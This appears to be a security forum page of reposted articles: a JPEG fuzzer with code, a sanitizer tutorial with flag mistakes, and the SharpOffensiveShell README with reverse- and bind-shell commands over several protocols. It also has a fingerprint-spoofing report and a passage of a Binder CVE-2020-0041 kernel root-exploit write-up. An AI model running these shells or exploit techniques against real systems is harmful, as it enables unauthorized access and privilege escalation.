crash.66340.jpg crash.78860.jpg crash.88799.jpg crash.94770.jpg crash.14060.jpg crash.24492.jpg crash.40953.jpg crash.49520.jpg crash.6637.jpg crash.79019.jpg crash.89072.jpg crash.95438.jpg crash.14905.jpg crash.25070.jpg crash.41505.jpg crash.50723.jpg crash.66389.jpg crash.79824.jpg crash.89738.jpg crash.95525.jpg crash.18188.jpg crash.27783.jpg crash.41700.jpg crash.52051.jpg crash.6718.jpg crash.81206.jpg crash.90506.jpg crash.96746.jpg crash.18350.jpg crash.2990.jpg crash.43509.jpg crash.54074.jpg crash.68527.jpg crash.8126.jpg crash.90648.jpg crash.98727.jpg crash.19441.jpg crash.30599.jpg crash.43765.jpg crash.55183.jpg crash.6987.jpg crash.82472.jpg crash.90745.jpg crash.9969.jpg crash.19581.jpg crash.31243.jpg crash.43813.jpg crash.5857.jpg crash.70713.jpg crash.83282.jpg crash.92426.jpg crash.19907.jpg crash.31563.jpg crash.44974.jpg crash.59625.jpg crash.77590.jpg crash.83284.jpg crash.92775.jpg crash.2010.jpg crash.32642.jpg crash.4554.jpg crash.64255.jpg crash.77787.jpg crash.84766.jpg crash.92906.jpg That’s a lot of crashes! Getting Serious, Conclusion The fuzzer could be optimized a ton, it’s really crude at the moment and only meant to demonstrate very basic mutation fuzzing. The bug triaging process is also a mess and felt really hacky the whole way, I guess I need to watch some more @gamozolabs streams. Maybe next time we do fuzzing we’ll try a harder target, write the fuzzer in a cool language like Rust or Go, and we’ll try to really refine the triaging process/exploit one of the bugs! Thanks to everyone referenced in the blogpost, huge thanks. Until next time! Code JPEGfuzz.py #!/usr/bin/env python3 import sys import random from pexpect import run from pipes import quote # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that being (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] counter = 0 while counter < 100000: data = get_bytes(filename) functions = [0, 1] picked_function = random.choice(functions) if picked_function == 0: mutated = magic(data) create_new(mutated) exif(counter,mutated) else: mutated = bit_flip(data) create_new(mutated) exif(counter,mutated) counter += 1 triage.py #!/usr/bin/env python3 import os from os import listdir def get_files(): files = os.listdir("/root/crashes/") return files def triage_files(files): for x in files: original_output = os.popen("exifsan " + x + " -verbose 2>&1").read() output = original_output # Getting crash reason crash = '' if "SEGV" in output: crash = "SEGV" elif "heap-buffer-overflow" in output: crash = "HBO" else: crash = "UNKNOWN" if crash == "HBO": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 target_line = target_line.split(" ") address = target_line[5].replace("0x","") target_line2 = target_line2.split(" ") operation = target_line2[0] elif crash == "SEGV": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 if "unknown address" in target_line: address = "00000000" else: address = None if "READ" in target_line2: operation = "READ" elif "WRITE" in target_line2: operation = "WRITE" else: operation = None log_name = (x.replace(".jpg","") + "." + crash + "." + address + "." + operation) f = open(log_name,"w+") f.write(original_output) f.close() files = get_files() triage_files(files) Tags: exif fuzzing jpeg mutation parsing Python Updated: April 04, 2020 Sursa: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/#
-
Detect Bugs using Google Sanitizers Apr 03, 2019 Shawn Tutorials No comments yet Google Sanitizers are a set of dynamic code analysis tools to detect common bugs in your code, including Thread Sanitizer: detect data race, thread leak, deadlock Address Sanitizer: detect buffer overflow, dangling pointer dereference Leak Sanitizer: part of Address Sanitizer, detect memory leak Undefined Behavior Sanitizer: detect integer overflow, float-number overflow Memory Sanitizer: detect of uninitialized memory reads Preparation For Windows users, install gcc with MinGW, or install Clang For Mac users, install Clang using `xcode-select --install` For Linux users, make sure you have gcc installed. Open CLion and make sure that the run button is clickable with toolchains configured correctly. Run Program with Sanitizer To run a program with sanitizer, we need a special flag -fsanitize to the compiler. Common options include: -fsanitize=address, -fsanitize=thread, -fsanitize=memory, -fsanitize=undefined, -fsanitize=leak. A full list of options can be found here. Note that it is not possible to combine more than one of the -fsanitize=address, -fsanitize=thread, and -fsanitize=memory checkers in the same program, so you may need to toggle the options multiple times for a comprehensive checking. For testing, let's add the following line to the CMakeLists.txt file: set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") When you run the code, you should be able to see a sanitizer tab next to the console. Thread Sanitizer Example Here is a poorly-written multithreading program: int counter = 0; pthread_mutex_t lock; void *inc() { pthread_mutex_lock(&lock); // lock not initiazlied counter++; // thread contention pthread_mutex_unlock(&lock); return NULL; } void thread_bugs() { pthread_t tid; for (int i = 0; i < 2; ++i) pthread_create(&tid, NULL, inc, NULL); printf("%d", counter); // print the result before join pthread_join(tid, NULL); // the first thread is not joined } Add the following line to the CMakeLists.txt to enable the Thread Sanitizer set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") When the program is executing, the sanitizer will generate a report for thread-related bugs. Be aware that your program might run significantly slower with sanitizers enabled. The sanitizer noticed that two threads are reading/writing to the same memory location at the line counter++;, since we the locked is used before initialized. There is also a data race between counter++ and the print statement since the main thread did not wait for one of the child threads. Finally, there is a thread leak by the same reason above. Address Sanitizer Example To enable the Address Sanitizer, you need to add the following line to the CMakeLists.txt set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") It helps you detect heap overflow, which may happen when you incorrectly calculated the size. Here is an example of overflowing a stack-allocated array The Address Sanitizer also checks for using freed pointers. Note that it shows you where is memory is allocated and freed. Here is a silly example of freeing the same memory twice, but it will be less noticeable when different pointers are pointing to the same heap location. References https://clang.llvm.org/docs/UsersManual.html https://www.jetbrains.com/help/clion/google-sanitizers.html Sursa: https://shawnzhong.com/2019/04/03/detect-bugs-using-google-sanitizers/
-
SharpOffensiveShell A sort of simple shell which support multiple protocols. This project is just for improving my C# coding ability. The SharpOffsensiveShell DNS mode use the Native Windows API instead of the Nslookup command to perform DNS requests. QuickStart SharpOffsensiveShell support .NET Framework 2.0 csc SharpOffensiveShell.cs TCP For bind shell sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 ncat -v 1.1.1.1 8080 For reverse shell ncat -lvp 8080 sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 UDP For bind shell sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 ncat -u -v 1.1.1.1 8080 For reverse shell ncat -u -lvp 8080 When reverse connection accepted, type enter to make prompt display. sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 ICMP git clone https://github.com/inquisb/icmpsh sysctl -w net.ipv4.icmp_echo_ignore_all=1 cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP sharpoffensiveshell.exe icmp connect listenIP DNS pip install dnslib git clone https://github.com/sensepost/DNS-Shell For direct mode python DNS-Shell.py -l -d [Server IP] sharpoffensiveshell.exe dns direct ServerIP Domain For recursive mode DNS-Shell.py -l -r [Domain] sharpoffensiveshell.exe dns recurse Domain Sursa: https://github.com/darkr4y/SharpOffensiveShell
-
Attackers can bypass fingerprint authentication with an ~80% success rate Fingerprint-based authentication is fine for most people, but it's hardly foolproof. Dan Goodin - 4/8/2020, 4:00 PM Enlarge Andri Koolme 117 with 76 posters participating, including story author Share on Facebook Share on Twitter For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices. Further Reading Bypassing TouchID was “no challenge at all,” hacker tells Ars Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts. A very high probability A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time. The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of from one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries. Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed. “Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking," Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person's privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.” The devices that were the most susceptible to fake fingerprints were the AICase padlock and Huawei’s Honor 7x and Samsung’s Note 9 Android phones, all of which were bypassed 100 percent of the time. Fingerprint authentication in the iPhone 8, MacBook Pro 2018, and the Samsung S10 came next, where the success rate was more than 90 percent. Five laptop models running Windows 10 and two USB drives—the Verbatim Fingerprint Secure and the Lexar Jumpdrive F35—performed the best, with researchers achieving a 0-percent success rate. The chart below summarizes the results: Enlarge / The orange lines are the percent of success with the direct collection method, the blue lines with the image sensor method and the yellow line with the picture method. Cisco Talos The reason for the better results from the Windows 10 machines, the researchers said, is that the comparison algorithm for all of them resided in the OS, and therefore the result was shared among all platforms. The researchers cautioned against concluding that the zero success-rate for Windows 10 devices and the USB drives meant they were safer. “We estimate that with a larger budget, more resources and a team dedicated to this task, it is possible to bypass these systems, too,” they wrote. One other product tested—a Samsung A70—also attained a 0-percent failure rate, but researchers attributed this to the difficulty getting authentication to work even when it received input from real fingerprints that had been enrolled. Defeating fingerprint authentication: A how-to There are two steps to fingerprint authentication: capturing, in which a sensor generates an image of the fingerprint, and analysis that compares the inputted fingerprint to the fingerprint that’s enrolled. Some devices use firmware that runs on the sensor to perform the comparison while others rely on the operating system. Windows Hello included in Windows 10, for example, performs the comparison from the OS using Microsoft’s Biometric Devices Design Guide. There are three types of sensors. Capacitive sensors use a finger’s natural electrical conductivity to read prints, as ridges touch the reader while valleys do not. Optical sensors read the image of a fingerprint by using a light source that illuminates ridges in contact with the reader and reads them through a prism. Ultrasonic sensors emit an ultrasonic pulse that generates an echo that’s read by the sensor, with ridges and valleys registering different signatures. The researchers devised three techniques for collecting the fingerprint of a target. The first is direct collection, which involves a target pressing a finger on a brand of clay known as Plastiline. With that, the attacker obtains a negative of the fingerprint. The second technique is to have the target press a finger onto a fingerprint reader, such as the kind that’s used at airports, banks, and border crossings. The reader would then capture a bitmap image of the print. The third is to capture a print on a drinking glass or other transparent surface and take a photograph of it. After the print is collected using the print reader or photo methods, certain optimizations are often required. For prints recorded on a fingerprint reader, for instance, multiple images had to be merged together to create a single image that was large enough to pass for a real fingerprint. Below is an example of the process, performed on fingerprints the FBI obtained from prohibition-era gangster Al Capone. Enlarge Prints captured on a glass and then photographed, meanwhile, had to be touched up with filters to increase the contrast. Then the researchers used digital sculpting tools such as ZBrush to create a 3D model based on the 2D picture. Enlarge / The 2-D image is on the left; the 3-D model is on the right. Cisco Talos Once the fingerprint was collected from either a scanner or glass and then optimized, the researchers replicated them onto a mold, which was made from either fabric glue or silicon. When working against capacitive sensors, materials also had to include graphite and aluminum powder to increase conductivity. To be successfully passed off as a real finger, the mold had to be a precise size. A variance of just 1 percent too big or too small would cause the attack to fail. This demand complicated the process, since the molds had to be cured to create rigidity and remove toxins. The curing often caused the molds to shrink. Casting the print onto a mold was done with either a 25-micron or 50-micron resolution 3D printer. The former was more accurate but required an hour to print a single mold. The latter took half as long but wasn’t as precise. Once researchers created a mold, they pressed it against the sensor to see if it treated the fake print as the real one enrolled to unlock the phone, laptop, or lock. The chart above showing the results tracks how various collection methods worked against specific devices. In seven cases, direct collection worked the best, and in only one case did a different method—a fingerprint reader—perform better. Making it work in the real world The higher success rate of direct collection doesn’t necessarily mean it’s the most effective collection method in real-world attacks, since it requires that the adversary trick or force a target to press a finger against a squishy piece of clay. By contrast, obtaining fingerprints from print readers or from photos of smudges on glass may be better since nation-state attackers may have an easier time recovering print images from an airport or customs checkpoint or surreptitiously obtaining a drinking glass after a target uses it. Further Reading OPM breach included five times more stolen fingerprints Another possibility is breaching a database of fingerprint data, as hackers did in 2014 when they stole 5.6 million sets of fingerprints from the US Office of Personnel Management. “The direct collection is always the better [option], because we directly have the mold (on the platiline),” Rascagneres, the Talos researcher, wrote in an email. “The size is perfect; we don’t need a 3D printer. This is the more efficient approach. The two other collection methods also work, but with lower success as expected.” The researchers balanced the stringent demands of the attack with a relatively modest budget of just $2,000. “The point of the low budget was to ensure the scenario was as realistic as possible," Rascagneres told me. “We determined if we could do it for $2k then it was reasonably feasible. What we found was that while we could keep the price point low, the process of making functional prints was actually very complex and time consuming.” The takeaway, the researchers said, isn’t that fingerprint authentication is too weak to be trusted. For most people in most settings, it’s perfectly fine, and when risks increase temporarily—such as when police with a search warrant come knocking on a door—users can usually disable fingerprint authentication and fall over to password or PIN verification. At the same time, users should remember that fingerprint authentication is hardly infallible. “Any fingerprint cloning technique is extremely difficult, making fingerprint authentication a valid method for 95 percent of the population,” Ventura, the other Talos researcher, wrote in an email. “People that have a low risk profile and don’t need to worry about nation-state level threat actors are fine. The remaining 5 percent could be exposed and may want to take other precautions.” Sursa: https://arstechnica.com/information-technology/2020/04/attackers-can-bypass-fingerprint-authentication-with-an-80-success-rate/
-
Exploiting the kernel with CVE-2020-0041 to achieve root privileges Posted on Apr 08, 2020 | Author: Eloi Sanfelix and Jordan Gruskovnjak A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041. In the previous post we described the bug and how to use it to escape the Google Chrome sandbox. If you haven't read that post, please do so now in order to understand what bug we are exploiting and what primitives we have available. In this post we'll describe how to attack the kernel and obtain root privileges on a Pixel 3 device using the same bug. Reminder: memory corruption primitives As described in our previous post, we can corrupt parts of a validated binder transaction while it's being processed by the driver. There are two stages at which these values are used that we could target for our attack: When the transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers. This is what we used to attack the Chrome browser process in the previous post. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the transaction buffer. Let's analyze the transaction buffer cleanup code in the binder driver while considering that we could have corrupted the transaction data: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 static void binder_transaction_buffer_release(struct binder_proc *proc, struct binder_buffer *buffer, binder_size_t failed_at, bool is_failure) { int debug_id = buffer->debug_id; binder_size_t off_start_offset, buffer_offset, off_end_offset; binder_debug(BINDER_DEBUG_TRANSACTION, "%d buffer release %d, size %zd-%zd, failed at %llx\n", proc->pid, buffer->debug_id, buffer->data_size, buffer->offsets_size, (unsigned long long)failed_at); if (buffer->target_node) [1] binder_dec_node(buffer->target_node, 1, 0); off_start_offset = ALIGN(buffer->data_size, sizeof(void *)); off_end_offset = is_failure ? failed_at : off_start_offset + buffer->offsets_size; [2] for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(binder_size_t)) { struct binder_object_header *hdr; size_t object_size; struct binder_object object; binder_size_t object_offset; binder_alloc_copy_from_buffer(&proc->alloc, &object_offset, buffer, buffer_offset, sizeof(object_offset)); object_size = binder_get_object(proc, buffer, object_offset, &object); if (object_size == 0) { pr_err("transaction release %d bad object at offset %lld, size %zd\n", debug_id, (u64)object_offset, buffer->data_size); continue; } hdr = &object.hdr; switch (hdr->type) { case BINDER_TYPE_BINDER: case BINDER_TYPE_WEAK_BINDER: { struct flat_binder_object *fp; struct binder_node *node; fp = to_flat_binder_object(hdr); [3] node = binder_get_node(proc, fp->binder); if (node == NULL) { pr_err("transaction release %d bad node %016llx\n", debug_id, (u64)fp->binder); break; } binder_debug(BINDER_DEBUG_TRANSACTION, " node %d u%016llx\n", node->debug_id, (u64)node->ptr); [4] binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0); binder_put_node(node); } break; ... case BINDER_TYPE_FDA: { ... /* * the source data for binder_buffer_object is visible * to user-space and the @buffer element is the user * pointer to the buffer_object containing the fd_array. * Convert the address to an offset relative to * the base of the transaction buffer. */ [5] fda_offset = (parent->buffer - (uintptr_t)buffer->user_data) + fda->parent_offset; for (fd_index = 0; fd_index < fda->num_fds; fd_index++) { u32 fd; binder_size_t offset = fda_offset + fd_index * sizeof(fd); binder_alloc_copy_from_buffer(&proc->alloc, &fd, buffer, offset, sizeof(fd)); [6] task_close_fd(proc, fd); } } break; default: pr_err("transaction release %d bad object type %x\n", debug_id, hdr->type); break; } } } At [1] the driver checks if there is a target binder node for the current transaction, and if it exists it decrements its reference count. This is interesting because it could trigger the release of such a node if its reference count reaches zero, but we do not have control of this pointer. At [2] the driver iterates through all objects in the transaction, and goes into a switch statement where the required cleanup is performed for each object type. For types BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, the cleanup involves looking up an object using fp->binder at [3] and then decrementing the reference count at [4]. Since fp->binder is read from the transaction buffer, we can actually prematurely release node references by replacing this value with a different one. This can in turn lead to use-after-free of binder_node objects. Finally, for BINDER_TYPE_FDA objects we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors on a remote process. In our exploit we targeted the reference counts of BINDER_TYPE_BINDER objects to cause a use-after-free on objects of type struct binder_node. This is exactly the same type of use-after-free we described in our OffensiveCon presentation about CVE-2019-2205. However some of the techniques we used in that exploit are not available to us in recent kernels anymore. Aside: using binder to talk to yourself The binder driver is designed in such a way that transactions can only be sent to handles you have received from other processes or to the context manager (handle 0). In general, when one wants to talk to a service, they first request a handle to the context manager (servicemanager, hwservicemanager or vndservicemanager for the three Binder domains used in current versions of Android). If a service creates a sub-service or an object on behalf of the client, then the service will send a handle such that the client can talk to the new object. In some situations, it would be beneficial to control both ends of the communication, e.g. to have better timing control for race conditions. In our particular case, we require knowing the address of the receiving-side binder mapping while we are sending the transaction to avoid a crash. Additionally, in order to cause a use-after-free with the corruption primitive we have, the receiving process has to create binder nodes with the fp->binder field equal to the sg_buf value we are corrupting with (which belongs to the sender address space). The easiest way to meet all these constraints is to control both the sending and the receiving end of a transaction. In that case, we have access to all the required values and do not need to use an info-leak to retrieve them from a remote process. However, we are not allowed to register services through the context manager from unprivileged applications, so we cannot go the normal route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to setup the communication channel. To our knowledge, this service was first publicly used by Gal Beniamini in this Project Zero report: Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve 20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188). We use this very same mechanism in our exploit in order to have a handle to our own "process". Note however that "process" here does not really mean an actual process, but a binder_proc structure associated to a binder file descriptor. This means we can open two binder file descriptors, create a token through the first file descriptor and retrieve it from the second one. With this, we have received a handle owned by the first file descriptor, and can now send binder transactions between the two. Leaking data with the binder_node use-after-free Binder nodes are used by the driver in two different ways: as part of transaction contents in order to pass them from one process to another, or as targets of a transaction. When used as part of a transaction, these nodes are always retrieved from a rb-tree of nodes and properly reference counted. When we cause a use-after-free of a node, it also gets removed from the rb-tree. For this reason, we can only have dangling pointers to freed nodes when used as targets of a transaction, since in this case pointers to the actual binder_node are stored by the driver in transaction->target_node. There are quite a few references to target_node in the binder driver, but many of them are performed in the sending path of a transaction or in debug code. From the others, the transaction receipt path provides us a way to leak some data back to userland: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 struct binder_transaction_data *trd = &tr.transaction_data; ... if (t->buffer->target_node) { struct binder_node *target_node = t->buffer->target_node; struct binder_priority node_prio; [1] trd->target.ptr = target_node->ptr; trd->cookie = target_node->cookie; node_prio.sched_policy = target_node->sched_policy; node_prio.prio = target_node->min_priority; binder_transaction_priority(current, t, node_prio, target_node->inherit_rt); cmd = BR_TRANSACTION; } else { trd->target.ptr = 0; trd->cookie = 0; cmd = BR_REPLY; } ... [2] if (copy_to_user(ptr, &tr, trsize)) { if (t_from) binder_thread_dec_tmpref(t_from); binder_cleanup_transaction(t, "copy_to_user failed", BR_FAILED_REPLY); return -EFAULT; } ptr += trsize; At [1] the driver extracts two 64-bit values from the target_node into the transaction_data structure. This structure is later copied to userland at [2]. Therefore, if we receive a transaction after we have freed its target_node and replaced it by another object, we can read out two 64-bit fields at the offsets corresponding to ptr and cookie. If we look at this structure on gdb for a build of a recent pixel 3 kernel, we can see these fields at offsets 0x58 and 0x60 respectively: (gdb) pt /o struct binder_node /* offset | size */ type = struct binder_node { /* 0 | 4 */ int debug_id; /* 4 | 4 */ spinlock_t lock; /* 8 | 24 */ struct binder_work { /* 8 | 16 */ struct list_head { /* 8 | 8 */ struct list_head *next; /* 16 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } entry; /* 24 | 4 */ enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type; /* total size (bytes): 24 */ } work; /* 32 | 24 */ union { /* 24 */ struct rb_node { /* 32 | 8 */ unsigned long __rb_parent_color; /* 40 | 8 */ struct rb_node *rb_right; /* 48 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rb_node; /* 16 */ struct hlist_node { /* 32 | 8 */ struct hlist_node *next; /* 40 | 8 */ struct hlist_node **pprev; /* total size (bytes): 16 */ } dead_node; /* total size (bytes): 24 */ }; /* 56 | 8 */ struct binder_proc *proc; /* 64 | 8 */ struct hlist_head { /* 64 | 8 */ struct hlist_node *first; /* total size (bytes): 8 */ } refs; /* 72 | 4 */ int internal_strong_refs; /* 76 | 4 */ int local_weak_refs; /* 80 | 4 */ int local_strong_refs; /* 84 | 4 */ int tmp_refs; /* 88 | 8 */ binder_uintptr_t ptr; /* 96 | 8 */ binder_uintptr_t cookie; /* 104 | 1 */ struct { /* 104: 7 | 1 */ u8 has_strong_ref : 1; /* 104: 6 | 1 */ u8 pending_strong_ref : 1; /* 104: 5 | 1 */ u8 has_weak_ref : 1; /* 104: 4 | 1 */ u8 pending_weak_ref : 1; /* total size (bytes): 1 */ }; /* 105 | 2 */ struct { /* 105: 6 | 1 */ u8 sched_policy : 2; /* 105: 5 | 1 */ u8 inherit_rt : 1; /* 105: 4 | 1 */ u8 accept_fds : 1; /* 105: 3 | 1 */ u8 txn_security_ctx : 1; /* XXX 3-bit hole */ /* 106 | 1 */ u8 min_priority; /* total size (bytes): 2 */ }; /* 107 | 1 */ bool has_async_transaction; /* XXX 4-byte hole */ /* 112 | 16 */ struct list_head { /* 112 | 8 */ struct list_head *next; /* 120 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } async_todo; /* total size (bytes): 128 */ } Therefore, we need to find objects that we can allocate and free at will, and that contain interesting data at these offsets. When we originally reported this bug to Google we produced a minimal exploit that overwrote selinux_enforcing, and we used a kgsl_drawobj_sync which would leak a pointer to itself and a pointer to a kernel function. This was enough for that minimal proof of concept, but not for a full root exploit as we are describing here. For the full exploit, we used the same object as in our CVE-2019-2025 exploit: the epitem structure used to track watched files within eventpoll: (gdb) pt /o struct epitem /* offset | size */ type = struct epitem { /* 0 | 24 */ union { /* 24 */ struct rb_node { /* 0 | 8 */ unsigned long __rb_parent_color; /* 8 | 8 */ struct rb_node *rb_right; /* 16 | 8 */ struct rb_node *rb_left; /* total size (bytes): 24 */ } rbn; /* 16 */ struct callback_head { /* 0 | 8 */ struct callback_head *next; /* 8 | 8 */ void (*func)(struct callback_head *); /* total size (bytes): 16 */ } rcu; /* total size (bytes): 24 */ }; /* 24 | 16 */ struct list_head { /* 24 | 8 */ struct list_head *next; /* 32 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } rdllink; /* 40 | 8 */ struct epitem *next; /* 48 | 12 */ struct epoll_filefd { /* 48 | 8 */ struct file *file; /* 56 | 4 */ int fd; /* total size (bytes): 12 */ } ffd; /* 60 | 4 */ int nwait; /* 64 | 16 */ struct list_head { /* 64 | 8 */ struct list_head *next; /* 72 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } pwqlist; /* 80 | 8 */ struct eventpoll *ep; /* 88 | 16 */ struct list_head { /* 88 | 8 */ struct list_head *next; /* 96 | 8 */ struct list_head *prev; /* total size (bytes): 16 */ } fllink; /* 104 | 8 */ struct wakeup_source *ws; /* 112 | 16 */ struct epoll_event { /* 112 | 4 */ __u32 events; /* XXX 4-byte hole */ /* 120 | 8 */ __u64 data; /* total size (bytes): 16 */ } event; /* total size (bytes): 128 */ } As can be seen above, the fllink linked list overlaps with the leaked fields. This list is used by eventpoll to link all epitem structures that are watching the same struct file. Thus, we can leak a pair of kernel pointers. There are several possibilities here, but let's consider how the data structures look like if we have only one such epitem structure for a particular struct file: Therefore, should we leak the fllink contents for the epitem in the picture above, we would learn two identical pointers into the file structure. Now consider what happens if we have a second epitem on the same file: In this case, if we leak from both epitem at the same time, we'd be learning their addresses as well as the address of the corresponding struct file. In our exploit we use both these tricks to disclose a struct file pointer and the address of the freed nodes before using them for the write primitive. Note however that in order to leak data, we need to leave a pending transaction queued until we can trigger the bug and free the binder_node. The exploit does this by having dedicated threads for each pending transaction, and then decrementing the reference count as many times as required to free the node. After this happens, we can leak from the freed buffer at any time we like, as many times as pending transactions we have created. Memory write primitive In order to identify a memory write primitive, we turn to another use of the transaction->target_node field: the decrement of the reference count in binder_transaction_buffer_release discussed earlier. Assume we have replaced the freed node with a fully controlled object. In this case, the driver decrements the reference count of the node with the following code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) { struct binder_proc *proc = node->proc; 